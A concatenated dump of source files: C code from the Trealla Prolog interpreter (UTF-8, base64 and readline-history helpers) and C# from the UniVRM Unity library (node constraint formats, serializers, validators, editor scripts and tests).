setInterval(window.refreshTwitch, 60000);
window.refreshTwitch();
| will101266/agariobot |
<|start_filename|>src/base64.h<|end_filename|>
#pragma once
// If user specified '*pdst' buffer, have to trust the length is
// enough and won't overflow. But this allows for using a static or
// stack-based buffer in controlled circumstances. If '*pdst' is zero
// a buffer will be allocated which must subsequently be freed by the
// caller...
size_t b64_encode(const char *src, size_t nbytes, char **pdst, int breaks, int cr);
size_t b64_decode(const char *src, size_t nbytes, char **pdst);
<|start_filename|>src/history.h<|end_filename|>
#ifndef HISTORY_H
#define HISTORY_H
extern void history_load(const char *filename);
extern void history_keywords(const char **word_array);
extern char *history_readline_eol(const char *prompt, char eol);
extern void history_save(void);
extern int history_getch_fd(int fd);
extern int history_getch(void);
#endif
<|start_filename|>src/version.c<|end_filename|>
const char *g_version = VERSION;
<|start_filename|>src/trealla.h<|end_filename|>
#pragma once
#include <stdbool.h>
#include <stdio.h>
typedef struct prolog_ prolog;
extern prolog *pl_create();
extern void pl_destroy(prolog*);
extern bool pl_eval(prolog*, const char *expr);
extern bool pl_consult(prolog*, const char *filename);
extern bool pl_consult_fp(prolog*, FILE *fp, const char *filename);
extern int get_halt_code(prolog*);
extern bool get_halt(prolog*);
extern bool get_status(prolog*);
extern bool get_dump_vars(prolog*);
extern void set_trace(prolog*);
extern void set_quiet(prolog*);
extern void set_stats(prolog*);
extern void set_noindex(prolog*);
extern void set_opt(prolog*, int onoff);
extern int g_tpl_interrupt, g_ac, g_avc;
extern char **g_av, *g_argv0;
extern char *g_tpl_lib;
extern const char *g_version;
<|start_filename|>src/library.h<|end_filename|>
#pragma once
#include <stdint.h>
typedef struct {
const char *name;
const unsigned char *start;
const unsigned int *len;
} library;
extern library g_libs[];
<|start_filename|>src/utf8.c<|end_filename|>
// This code follows the "be liberal in what you accept, be strict
// in what you emit" rule. It decodes deprecated 6-byte UTF-8
// but will not encode them.
#include <ctype.h>
#include <wctype.h>
#include <stdio.h>
#include <stdlib.h>
#ifndef _WIN32
#include <unistd.h>
#endif
#include "utf8.h"
size_t strlen_utf8(const char *s)
{
size_t cnt = 0;
while (*s) {
unsigned char ch = *(const unsigned char *)s++;
if ((ch < 0x80) || (ch > 0xBF))
cnt++;
}
return cnt;
}
size_t substrlen_utf8(const char *s, size_t n)
{
const char *end = s + n;
size_t cnt = 0;
while (s < end) {
unsigned char ch = *(const unsigned char *)s++;
if ((ch < 0x80) || (ch > 0xBF))
cnt++;
}
return cnt;
}
const char *strchr_utf8(const char *s, int ch)
{
const char *src = s;
while (*src && (peek_char_utf8(src) != ch))
get_char_utf8(&src);
if (!*src || (peek_char_utf8(src) != ch))
return NULL;
return src;
}
const char *strrchr_utf8(const char *s, int ch)
{
const char *src = s, *save_src = NULL;
while (*src) {
while (*src && peek_char_utf8(src) != ch)
get_char_utf8(&src);
if (!*src || (peek_char_utf8(src) != ch))
return save_src;
save_src = src;
}
return save_src;
}
bool is_char_utf8(const char *src)
{
unsigned char ch = *(const unsigned char *)src;
return (ch >= 0x80) && (ch <= 0xBF);
}
int put_len_utf8(int _ch)
{
unsigned int ch = (unsigned int)_ch;
int len = 0;
if (ch <= 0x7F)
len = 1;
else if (ch <= 0x07FF)
len = 2;
else if (ch <= 0xFFFF)
len = 3;
else if (ch <= 0x010FFFF)
len = 4;
else
len = 0;
return len;
}
int put_char_bare_utf8(char *_dst, int _ch)
{
unsigned int ch = (unsigned int)_ch;
unsigned char *dst = (unsigned char *)_dst;
int len = 0;
if (ch <= 0x7F) {
*dst++ = ch;
len = 1;
} else if (ch <= 0x07FF) {
*dst = 0b11000000;
*dst++ |= (ch >> 6) & 0b00011111;
*dst = 0b10000000;
*dst++ |= (ch & 0b00111111);
len = 2;
} else if (ch <= 0xFFFF) {
*dst = 0b11100000;
*dst++ |= (ch >> 12) & 0b00001111;
*dst = 0b10000000;
*dst++ |= (ch >> 6) & 0b00111111;
*dst = 0b10000000;
*dst++ |= ch & 0b00111111;
len = 3;
} else if (ch <= 0x010FFFF) {
*dst = 0b11110000;
*dst++ |= (ch >> 18) & 0b00000111;
*dst = 0b10000000;
*dst++ |= (ch >> 12) & 0b00111111;
*dst = 0b10000000;
*dst++ |= (ch >> 6) & 0b00111111;
*dst = 0b10000000;
*dst++ |= ch & 0b00111111;
len = 4;
} else
len = 0;
return len;
}
int put_char_utf8(char *dst, int ch)
{
int len = put_char_bare_utf8(dst, ch);
dst[len] = '\0';
return len;
}
int peek_char_utf8(const char *src)
{
return get_char_utf8(&src);
}
size_t len_char_utf8(const char *_src)
{
const char *src = _src;
get_char_utf8(&src);
return src - _src;
}
int get_char_utf8(const char **_src)
{
const unsigned char *src = (const unsigned char *)*_src;
int expect = 1;
unsigned int n = 0;
while (expect--) {
unsigned char ch = *src++;
if ((ch & 0b11111100) == 0b11111100) {
n = ch & 0b00000001;
expect = 5;
} else if ((ch & 0b11111000) == 0b11111000) {
n = ch & 0b00000011;
expect = 4;
} else if ((ch & 0b11110000) == 0b11110000) {
n = ch & 0b00000111;
expect = 3;
} else if ((ch & 0b11100000) == 0b11100000) {
n = ch & 0b00001111;
expect = 2;
} else if ((ch & 0b11000000) == 0b11000000) {
n = ch & 0b00011111;
expect = 1;
} else if ((ch & 0b10000000) == 0b10000000) {
n <<= 6;
n |= ch & 0b00111111;
} else {
n = ch;
}
}
*_src = (const char *)src;
return (int)n;
}
// Note: 'fn' is a byte-getter function (eg. fgetc)
int xgetc_utf8(int(*fn)(), void *p1)
{
unsigned int n = 0;
int expect = 1;
while (expect--) {
int _ch = fn(p1);
if (_ch == EOF)
return EOF;
unsigned char ch = (unsigned char)_ch;
if ((ch & 0b11111100) == 0b11111100) {
n = ch & 0b00000001;
expect = 5;
} else if ((ch & 0b11111000) == 0b11111000) {
n = ch & 0b00000011;
expect = 4;
} else if ((ch & 0b11110000) == 0b11110000) {
n = ch & 0b00000111;
expect = 3;
} else if ((ch & 0b11100000) == 0b11100000) {
n = ch & 0b00001111;
expect = 2;
} else if ((ch & 0b11000000) == 0b11000000) {
n = ch & 0b00011111;
expect = 1;
} else if ((ch & 0b10000000) == 0b10000000) {
n <<= 6;
n |= ch & 0b00111111;
} else {
n = ch;
}
}
return (int)n;
}
int character_at_pos(const char *buffer, size_t buflen, size_t i)
{
const char *src = buffer;
size_t idx = 0;
while (src < (buffer+buflen)) {
int ch = get_char_utf8(&src);
if (idx++ == i)
return ch;
}
return 0;
}
size_t offset_at_pos(const char *buffer, size_t buflen, size_t i)
{
const char *src = buffer;
size_t idx = 0;
while (src < (buffer+buflen)) {
if (idx++ == i)
break;
get_char_utf8(&src);
}
return src - buffer;
}
<|start_filename|>src/history.c<|end_filename|>
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <assert.h>
#include <readline/readline.h>
#include <readline/history.h>
#include "history.h"
#include "utf8.h"
#include <termios.h>
#include <unistd.h>
#include "cdebug.h"
int history_getch(void)
{
struct termios oldattr, newattr;
tcgetattr(STDIN_FILENO, &oldattr);
newattr = oldattr;
newattr.c_lflag &= ~(ICANON | ECHO);
tcsetattr(STDIN_FILENO, TCSANOW, &newattr);
int ch = fgetc_utf8(stdin);
tcsetattr(STDIN_FILENO, TCSANOW, &oldattr);
return ch;
}
int history_getch_fd(int fd)
{
struct termios oldattr, newattr;
tcgetattr(fd, &oldattr);
newattr = oldattr;
newattr.c_lflag &= ~(ICANON | ECHO);
tcsetattr(fd, TCSANOW, &newattr);
int ch = fgetc_utf8(stdin);
tcsetattr(fd, TCSANOW, &oldattr);
return ch;
}
char *history_readline_eol(const char *prompt, char eol)
{
char *cmd = NULL;
char *line;
LOOP:
if ((line = readline(prompt)) == NULL)
return NULL;
if (cmd) {
size_t n = strlen(cmd) + strlen(line);
cmd = realloc(cmd, n+1);
ensure(cmd);
strcat(cmd, line);
} else {
cmd = strdup(line);
}
free(line);
const char *s = cmd;
for (;;) {
int ch = get_char_utf8(&s);
const char *end_ptr = cmd + strlen(cmd) - (strlen(cmd) ? 1 : 0);
while (isspace(*end_ptr) && (end_ptr != cmd))
end_ptr--;
if ((ch == 0) && (*end_ptr == eol)) {
if (strcmp(cmd, "halt.") && strcmp(cmd, "."))
add_history(cmd);
break;
}
if (ch == 0) {
cmd = realloc(cmd, strlen(cmd)+1+1);
strcat(cmd, "\n");
prompt = "";
goto LOOP;
}
}
return cmd;
}
static char g_filename[1024];
void history_load(const char *filename)
{
snprintf(g_filename, sizeof(g_filename), "%s", filename);
using_history();
read_history(g_filename);
}
void history_save(void)
{
write_history(g_filename);
//rl_clear_history();
clear_history();
}
<|start_filename|>src/contrib.c<|end_filename|>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <ctype.h>
#include <math.h>
#include <float.h>
#include <errno.h>
#include "trealla.h"
#include "internal.h"
#include "builtins.h"
const struct builtins g_contrib_funcs[] =
{
{0}
};
| nickmain/trealla |
<|start_filename|>Assets/VRM10/Runtime/Format/Constraints/Format.g.cs<|end_filename|>
// This file is generated from JsonSchema. Don't modify this source code.
using System;
using System.Collections.Generic;
namespace UniGLTF.Extensions.VRMC_node_constraint
{
public enum ObjectSpace
{
model,
local,
}
public class PositionConstraint
{
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// The user-defined name of this object.
public string Name;
// The index of the node constrains the node.
public int? Source;
// The source node will be evaluated in this space.
public ObjectSpace SourceSpace;
// The destination node will be evaluated in this space.
public ObjectSpace DestinationSpace;
// Axes be constrained by this constraint, in X-Y-Z order.
public bool[] FreezeAxes;
// The weight of the constraint.
public float? Weight;
}
public class RotationConstraint
{
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// The user-defined name of this object.
public string Name;
// The index of the node constrains the node.
public int? Source;
// The source node will be evaluated in this space.
public ObjectSpace SourceSpace;
// The destination node will be evaluated in this space.
public ObjectSpace DestinationSpace;
// Axes be constrained by this constraint, in X-Y-Z order.
public bool[] FreezeAxes;
// The weight of the constraint.
public float? Weight;
}
public class AimConstraint
{
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// The user-defined name of this object.
public string Name;
// The index of the node constrains the node.
public int? Source;
// The source node will be evaluated in this space.
public ObjectSpace SourceSpace;
// The destination node will be evaluated in this space.
public ObjectSpace DestinationSpace;
// An axis which faces the direction of its source.
public float[] AimVector;
// An up axis of the constraint.
public float[] UpVector;
// Axes be constrained by this constraint, in Yaw-Pitch order.
public bool[] FreezeAxes;
// The weight of the constraint.
public float? Weight;
}
public class Constraint
{
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// A constraint that links the position with a source.
public PositionConstraint Position;
// A constraint that links the rotation with a source.
public RotationConstraint Rotation;
// A constraint that rotates the node to face a source.
public AimConstraint Aim;
}
public class VRMC_node_constraint
{
public const string ExtensionName = "VRMC_node_constraint";
// Dictionary object with extension-specific objects.
public object Extensions;
// Application-specific data.
public object Extras;
// Specification version of VRMC_node_constraint
public string SpecVersion;
// Contains position, rotation, or aim
public Constraint Constraint;
}
}
<|start_filename|>Assets/VRM/Editor/BlendShape/VRMBlendShapeProxyValidator.cs<|end_filename|>
using System.Collections.Generic;
using UniGLTF;
using UnityEngine;
namespace VRM
{
public static class VRMBlendShapeProxyValidator
{
public static IEnumerable<Validation> Validate(this VRMBlendShapeProxy p, GameObject _)
{
if (p == null)
{
yield return Validation.Error("VRMBlendShapeProxy is null");
yield break;
}
if (p.BlendShapeAvatar == null)
{
yield return Validation.Error("BlendShapeAvatar is null");
yield break;
}
// presetがユニークか
var used = new HashSet<BlendShapeKey>();
foreach (var c in p.BlendShapeAvatar.Clips)
{
var key = c.Key;
if (used.Contains(key))
{
yield return Validation.Error($"duplicated BlendShapeKey: {key}");
}
else
{
used.Add(key);
}
}
var materialNames = new HashSet<string>();
foreach (var r in p.GetComponentsInChildren<Renderer>(true))
{
foreach (var m in r.sharedMaterials)
{
if (m != null)
{
if (!materialNames.Contains(m.name))
{
materialNames.Add(m.name);
}
}
}
}
// 参照が生きているか
foreach (var c in p.BlendShapeAvatar.Clips)
{
for (int i = 0; i < c.Values.Length; ++i)
{
var v = c.Values[i];
var target = p.transform.Find(v.RelativePath);
if (target == null)
{
yield return Validation.Warning($"{c}.Values[{i}].RelativePath({v.RelativePath} is not found");
}
}
for (int i = 0; i < c.MaterialValues.Length; ++i)
{
var v = c.MaterialValues[i];
if (!materialNames.Contains(v.MaterialName))
{
yield return Validation.Warning($"{c}.MaterialValues[{i}].MaterialName({v.MaterialName} is not found");
}
}
}
}
}
}
<|start_filename|>docs/_templates/layout.html<|end_filename|>
{% extends "!layout.html" %}
{% block sidebartitle %}
{%- if language != "en" %}
[日本語] <a href="{{ pathto('../en/', 1) }}{{ pathto(pagename, 0, '.') }}">English</a>
{%- endif %}
{%- if language != "ja" %}
<a href="{{ pathto('../ja/', 1) }}{{ pathto(pagename, 0, '.') }}">日本語</a> [English]
{%- endif %}
{{ super() }}
{% endblock %}
<|start_filename|>Assets/VRM10/Editor/Components/Constraint/VRM10PositionConstraintEditor.cs<|end_filename|>
using System.Text;
using UnityEditor;
using UnityEngine;
namespace UniVRM10
{
[CustomEditor(typeof(VRM10PositionConstraint))]
public class VRM10PositionConstraintEditor : VRM10PositionRotationConstraintEditorBase
{
}
}
<|start_filename|>Assets/UniGLTF/Runtime/UniGLTF/IO/MeshIO/MeshVertex.cs<|end_filename|>
using System;
using System.Runtime.InteropServices;
using UnityEngine;
using UnityEngine.Rendering;
namespace UniGLTF
{
/// <summary>
/// インターリーブされたメッシュの頂点情報を表す構造体
/// そのままGPUにアップロードされる
/// </summary>
[Serializable, StructLayout(LayoutKind.Sequential)]
internal readonly struct MeshVertex
{
private readonly Vector3 _position;
private readonly Vector3 _normal;
private readonly Color _color;
private readonly Vector2 _texCoord0;
private readonly Vector2 _texCoord1;
private readonly float _boneWeight0;
private readonly float _boneWeight1;
private readonly float _boneWeight2;
private readonly float _boneWeight3;
private readonly ushort _boneIndex0;
private readonly ushort _boneIndex1;
private readonly ushort _boneIndex2;
private readonly ushort _boneIndex3;
public MeshVertex(
Vector3 position,
Vector3 normal,
Vector2 texCoord0,
Vector2 texCoord1,
Color color,
ushort boneIndex0,
ushort boneIndex1,
ushort boneIndex2,
ushort boneIndex3,
float boneWeight0,
float boneWeight1,
float boneWeight2,
float boneWeight3)
{
_position = position;
_normal = normal;
_texCoord0 = texCoord0;
_texCoord1 = texCoord1;
_color = color;
_boneIndex0 = boneIndex0;
_boneIndex1 = boneIndex1;
_boneIndex2 = boneIndex2;
_boneIndex3 = boneIndex3;
_boneWeight0 = boneWeight0;
_boneWeight1 = boneWeight1;
_boneWeight2 = boneWeight2;
_boneWeight3 = boneWeight3;
}
public static VertexAttributeDescriptor[] GetVertexAttributeDescriptor() => new[] {
new VertexAttributeDescriptor(VertexAttribute.Position),
new VertexAttributeDescriptor(VertexAttribute.Normal),
new VertexAttributeDescriptor(VertexAttribute.Color, dimension: 4),
new VertexAttributeDescriptor(VertexAttribute.TexCoord0, dimension: 2),
new VertexAttributeDescriptor(VertexAttribute.TexCoord1, dimension: 2),
new VertexAttributeDescriptor(VertexAttribute.BlendWeight, dimension: 4),
new VertexAttributeDescriptor(VertexAttribute.BlendIndices, VertexAttributeFormat.UInt16, 4),
};
}
}
<|start_filename|>Assets/VRM10/Runtime/Components/SpringBone/VRM10SpringBoneCollider.cs<|end_filename|>
using System;
using UnityEngine;
namespace UniVRM10
{
public enum VRM10SpringBoneColliderTypes
{
Sphere,
Capsule,
}
[Serializable]
public class VRM10SpringBoneCollider : MonoBehaviour
{
public VRM10SpringBoneColliderTypes ColliderType;
/// <summary>bone local position</summary>
public Vector3 Offset;
[Range(0, 1.0f)]
public float Radius;
/// <summary>bone local position</summary>
public Vector3 Tail;
public static int SelectedGuid;
public bool IsSelected => GetInstanceID() == SelectedGuid;
}
}
<|start_filename|>Assets/VRM10/Tests/ApiSampleTests.cs<|end_filename|>
using System.IO;
using NUnit.Framework;
using UniGLTF;
using UniGLTF.Extensions.VRMC_vrm;
using UnityEngine;
using VRMShaders;
namespace UniVRM10.Test
{
public class ApiSampleTests
{
VrmLib.Model ReadModel(string path)
{
var bytes = MigrationVrm.Migrate(File.ReadAllBytes(path));
var data = new GlbLowLevelParser(path, bytes).Parse();
var model = ModelReader.Read(data);
return model;
}
GameObject BuildGameObject(Vrm10Data data, bool showMesh)
{
using (var loader = new Vrm10Importer(data))
{
var loaded = loader.Load();
if (showMesh)
{
loaded.ShowMeshes();
}
loaded.EnableUpdateWhenOffscreen();
return loaded.gameObject;
}
}
[Test]
public void Sample()
{
var path = "Tests/Models/Alicia_vrm-0.51/AliciaSolid_vrm-0.51.vrm";
Debug.Log($"load: {path}");
Assert.IsTrue(Vrm10Data.TryParseOrMigrate(path, true, out Vrm10Data result));
var go = BuildGameObject(result, true);
Debug.Log(go);
// export
var vrmBytes = Vrm10Exporter.Export(go, new EditorTextureSerializer());
Debug.Log($"export {vrmBytes.Length} bytes");
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Format/Constraints/Serializer.g.cs<|end_filename|>
// This file is generated from JsonSchema. Don't modify this source code.
using System;
using System.Collections.Generic;
using System.Linq;
using UniJSON;
namespace UniGLTF.Extensions.VRMC_node_constraint {
static public class GltfSerializer
{
public static void SerializeTo(ref UniGLTF.glTFExtension dst, VRMC_node_constraint extension)
{
if (dst is glTFExtensionImport)
{
throw new NotImplementedException();
}
if (!(dst is glTFExtensionExport extensions))
{
extensions = new glTFExtensionExport();
dst = extensions;
}
var f = new JsonFormatter();
Serialize(f, extension);
extensions.Add(VRMC_node_constraint.ExtensionName, f.GetStoreBytes());
}
public static void Serialize(JsonFormatter f, VRMC_node_constraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(!string.IsNullOrEmpty(value.SpecVersion)){
f.Key("specVersion");
f.Value(value.SpecVersion);
}
if(value.Constraint!=null){
f.Key("constraint");
Serialize_Constraint(f, value.Constraint);
}
f.EndMap();
}
public static void Serialize_Constraint(JsonFormatter f, Constraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(value.Position!=null){
f.Key("position");
__constraint_Serialize_Position(f, value.Position);
}
if(value.Rotation!=null){
f.Key("rotation");
__constraint_Serialize_Rotation(f, value.Rotation);
}
if(value.Aim!=null){
f.Key("aim");
__constraint_Serialize_Aim(f, value.Aim);
}
f.EndMap();
}
public static void __constraint_Serialize_Position(JsonFormatter f, PositionConstraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(!string.IsNullOrEmpty(value.Name)){
f.Key("name");
f.Value(value.Name);
}
if(value.Source.HasValue){
f.Key("source");
f.Value(value.Source.GetValueOrDefault());
}
if(true){
f.Key("sourceSpace");
f.Value(value.SourceSpace.ToString());
}
if(true){
f.Key("destinationSpace");
f.Value(value.DestinationSpace.ToString());
}
if(value.FreezeAxes!=null&&value.FreezeAxes.Count()>=3){
f.Key("freezeAxes");
__constraint__position_Serialize_FreezeAxes(f, value.FreezeAxes);
}
if(value.Weight.HasValue){
f.Key("weight");
f.Value(value.Weight.GetValueOrDefault());
}
f.EndMap();
}
public static void __constraint__position_Serialize_FreezeAxes(JsonFormatter f, bool[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
public static void __constraint_Serialize_Rotation(JsonFormatter f, RotationConstraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(!string.IsNullOrEmpty(value.Name)){
f.Key("name");
f.Value(value.Name);
}
if(value.Source.HasValue){
f.Key("source");
f.Value(value.Source.GetValueOrDefault());
}
if(true){
f.Key("sourceSpace");
f.Value(value.SourceSpace.ToString());
}
if(true){
f.Key("destinationSpace");
f.Value(value.DestinationSpace.ToString());
}
if(value.FreezeAxes!=null&&value.FreezeAxes.Count()>=3){
f.Key("freezeAxes");
__constraint__rotation_Serialize_FreezeAxes(f, value.FreezeAxes);
}
if(value.Weight.HasValue){
f.Key("weight");
f.Value(value.Weight.GetValueOrDefault());
}
f.EndMap();
}
public static void __constraint__rotation_Serialize_FreezeAxes(JsonFormatter f, bool[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
public static void __constraint_Serialize_Aim(JsonFormatter f, AimConstraint value)
{
f.BeginMap();
if(value.Extensions!=null){
f.Key("extensions");
(value.Extensions as glTFExtension).Serialize(f);
}
if(value.Extras!=null){
f.Key("extras");
(value.Extras as glTFExtension).Serialize(f);
}
if(!string.IsNullOrEmpty(value.Name)){
f.Key("name");
f.Value(value.Name);
}
if(value.Source.HasValue){
f.Key("source");
f.Value(value.Source.GetValueOrDefault());
}
if(true){
f.Key("sourceSpace");
f.Value(value.SourceSpace.ToString());
}
if(true){
f.Key("destinationSpace");
f.Value(value.DestinationSpace.ToString());
}
if(value.AimVector!=null&&value.AimVector.Count()>=3){
f.Key("aimVector");
__constraint__aim_Serialize_AimVector(f, value.AimVector);
}
if(value.UpVector!=null&&value.UpVector.Count()>=3){
f.Key("upVector");
__constraint__aim_Serialize_UpVector(f, value.UpVector);
}
if(value.FreezeAxes!=null&&value.FreezeAxes.Count()>=2){
f.Key("freezeAxes");
__constraint__aim_Serialize_FreezeAxes(f, value.FreezeAxes);
}
if(value.Weight.HasValue){
f.Key("weight");
f.Value(value.Weight.GetValueOrDefault());
}
f.EndMap();
}
public static void __constraint__aim_Serialize_AimVector(JsonFormatter f, float[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
public static void __constraint__aim_Serialize_UpVector(JsonFormatter f, float[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
public static void __constraint__aim_Serialize_FreezeAxes(JsonFormatter f, bool[] value)
{
f.BeginList();
foreach(var item in value)
{
f.Value(item);
}
f.EndList();
}
} // class
} // namespace
<|start_filename|>Assets/VRM/Tests/VRMLookAtTests.cs<|end_filename|>
using System.IO;
using NUnit.Framework;
using UniGLTF;
using UnityEngine;
namespace VRM
{
public class VRMLookAtTests
{
static string AliciaPath
{
get
{
return Path.GetFullPath(Application.dataPath + "/../Tests/Models/Alicia_vrm-0.51/AliciaSolid_vrm-0.51.vrm")
.Replace("\\", "/");
}
}
[Test]
public void VRMLookAtTest()
{
var data = new GlbFileParser(AliciaPath).Parse();
byte[] bytes = default;
using (var loader = new VRMImporterContext(new VRMData(data)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var go = loaded.gameObject;
var fp = go.GetComponent<VRMFirstPerson>();
GameObject.DestroyImmediate(go.GetComponent<VRMLookAtBoneApplyer>());
var lookAt = go.AddComponent<VRMLookAtBlendShapeApplyer>();
bytes = VRMEditorExporter.Export(go, null, new VRMExportSettings
{
PoseFreeze = true,
});
}
var data2 = new GlbLowLevelParser(AliciaPath, bytes).Parse();
using (var loader2 = new VRMImporterContext(new VRMData(data2)))
{
Assert.AreEqual(LookAtType.BlendShape, loader2.VRM.firstPerson.lookAtType);
}
}
[Test]
public void VRMLookAtCurveMapWithFreezeTest()
{
var data = new GlbFileParser(AliciaPath).Parse();
byte[] bytes = default;
CurveMapper horizontalInner = default;
using (var loader = new VRMImporterContext(new VRMData(data)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var go = loaded.gameObject;
var fp = go.GetComponent<VRMFirstPerson>();
var lookAt = go.GetComponent<VRMLookAtBoneApplyer>();
horizontalInner = lookAt.HorizontalInner;
bytes = VRMEditorExporter.Export(go, null, new VRMExportSettings
{
PoseFreeze = true,
});
}
var data2 = new GlbLowLevelParser(AliciaPath, bytes).Parse();
using (var loader = new VRMImporterContext(new VRMData(data2)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var lookAt = loaded.GetComponent<VRMLookAtBoneApplyer>();
Assert.AreEqual(horizontalInner.CurveXRangeDegree, lookAt.HorizontalInner.CurveXRangeDegree);
Assert.AreEqual(horizontalInner.CurveYRangeDegree, lookAt.HorizontalInner.CurveYRangeDegree);
}
}
[Test]
public void VRMLookAtCurveMapTest()
{
var data = new GlbFileParser(AliciaPath).Parse();
byte[] bytes = default;
CurveMapper horizontalInner = default;
using (var loader = new VRMImporterContext(new VRMData(data)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var go = loaded.gameObject;
var fp = go.GetComponent<VRMFirstPerson>();
var lookAt = go.GetComponent<VRMLookAtBoneApplyer>();
horizontalInner = lookAt.HorizontalInner;
bytes = VRMEditorExporter.Export(go, null, new VRMExportSettings
{
PoseFreeze = false,
});
}
var data2 = new GlbLowLevelParser(AliciaPath, bytes).Parse();
using (var loader = new VRMImporterContext(new VRMData(data2)))
using (var loaded = loader.Load())
{
loaded.ShowMeshes();
var lookAt = loaded.GetComponent<VRMLookAtBoneApplyer>();
Assert.AreEqual(horizontalInner.CurveXRangeDegree, lookAt.HorizontalInner.CurveXRangeDegree);
Assert.AreEqual(horizontalInner.CurveYRangeDegree, lookAt.HorizontalInner.CurveYRangeDegree);
}
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Components/Constraint/VRM10AimConstraint.cs<|end_filename|>
using System;
using UniGLTF.Extensions.VRMC_node_constraint;
using UnityEngine;
namespace UniVRM10
{
[DisallowMultipleComponent]
public class VRM10AimConstraint : VRM10Constraint
{
/// <summary>
/// Yaw(Y), Pitch(X) の2軸だけ
/// </summary>
[SerializeField]
[EnumFlags]
YawPitchMask m_freezeAxes = default;
public YawPitchMask FreezeAxes
{
get => m_freezeAxes;
set => m_freezeAxes = value;
}
[Header("Source")]
[SerializeField]
Transform m_source = default;
public override Transform Source
{
get => m_source;
set => m_source = value;
}
[Header("Destination")]
[SerializeField]
ObjectSpace m_destinationCoordinate = default;
/// <summary>
/// シリアライズは、Aim と Up で記録。
/// UniVRM の Editor では Aim と Up が直交しないことを許可しない。
/// </summary>
[SerializeField]
public Quaternion DestinationOffset = Quaternion.identity;
Quaternion m_delta;
public Quaternion Delta => m_delta;
public Vector3 UpVector
{
get
{
switch (m_destinationCoordinate)
{
case ObjectSpace.model: return ModelRoot.up;
case ObjectSpace.local:
{
if (m_src == null)
{
return transform.up;
}
return (TR.FromParent(transform).Rotation * m_dst.LocalInitial.Rotation) * Vector3.up;
}
default:
throw new NotImplementedException();
}
}
}
public override void OnProcess()
{
var zAxis = (Source.position - transform.position).normalized;
var xAxis = Vector3.Cross(UpVector, zAxis);
var yAxis = Vector3.Cross(zAxis, xAxis);
var m = new Matrix4x4(xAxis, yAxis, zAxis, new Vector4(0, 0, 0, 1));
var parent = TR.FromParent(transform);
m_delta = Quaternion.Inverse(parent.Rotation * m_src.LocalInitial.Rotation * DestinationOffset) * m.rotation;
var (yaw, pitch) = Matrix4x4.Rotate(Quaternion.Inverse(m_delta)).CalcYawPitch(Vector3.forward);
if (m_freezeAxes.HasFlag(YawPitchMask.Yaw)) yaw = 0;
if (m_freezeAxes.HasFlag(YawPitchMask.Pitch)) pitch = 0;
m_delta = Quaternion.Euler(pitch, yaw, 0);
transform.rotation = parent.Rotation * m_src.LocalInitial.Rotation * Delta;
}
}
}
<|start_filename|>Assets/VRM10/Runtime/Components/Constraint/VRM10PositionConstraint.cs<|end_filename|>
using System;
using UniGLTF.Extensions.VRMC_node_constraint;
using UnityEngine;
namespace UniVRM10
{
/// <summary>
/// 対象の初期位置と現在位置の差分(delta)を、自身の初期位置に対してWeightを乗算して加算する。
/// </summary>
[DisallowMultipleComponent]
public class VRM10PositionConstraint : VRM10RotationPositionConstraintBase
{
public override Vector3 Delta => FreezeAxes.Freeze(m_delta.Translation) * Weight;
public override TR GetSourceCurrent()
{
var coords = GetSourceCoords();
if (m_src == null)
{
return coords;
}
return coords * new TR(Delta);
}
public override TR GetDstCurrent()
{
var coords = GetDstCoords();
if (m_src == null)
{
return coords;
}
return coords * new TR(Delta);
}
protected override void ApplyDelta()
{
switch (DestinationCoordinate)
{
case ObjectSpace.local:
m_dst.ApplyLocal(DestinationInitialCoords(ObjectSpace.local) * new TR(DestinationOffset) * new TR(Delta));
break;
case ObjectSpace.model:
m_dst.ApplyModel(DestinationInitialCoords(ObjectSpace.model) * new TR(DestinationOffset) * new TR(Delta));
break;
default:
throw new NotImplementedException();
}
}
}
}
<|start_filename|>Assets/VRM10/Editor/Components/Constraint/VRM10AimConstraintEditor.cs<|end_filename|>
using System.Text;
using UnityEditor;
using UnityEngine;
namespace UniVRM10
{
[CustomEditor(typeof(VRM10AimConstraint))]
public class VRM10AimConstraintEditor : Editor
{
VRM10AimConstraint m_target;
void OnEnable()
{
m_target = (VRM10AimConstraint)target;
}
static GUIStyle s_style;
static GUIStyle Style
{
get
{
if (s_style == null)
{
s_style = new GUIStyle("box");
}
return s_style;
}
}
static void DrawAimUp(Quaternion rot, Vector3 pos, Color c)
{
Handles.matrix = Matrix4x4.identity;
Handles.color = c;
// aim
var aim = pos + rot * Vector3.forward * 0.3f;
Handles.DrawLine(pos, aim);
Handles.Label(aim, "aim");
// up
var up = pos + rot * Vector3.up * 0.3f;
Handles.DrawLine(pos, up);
Handles.Label(up, "up");
}
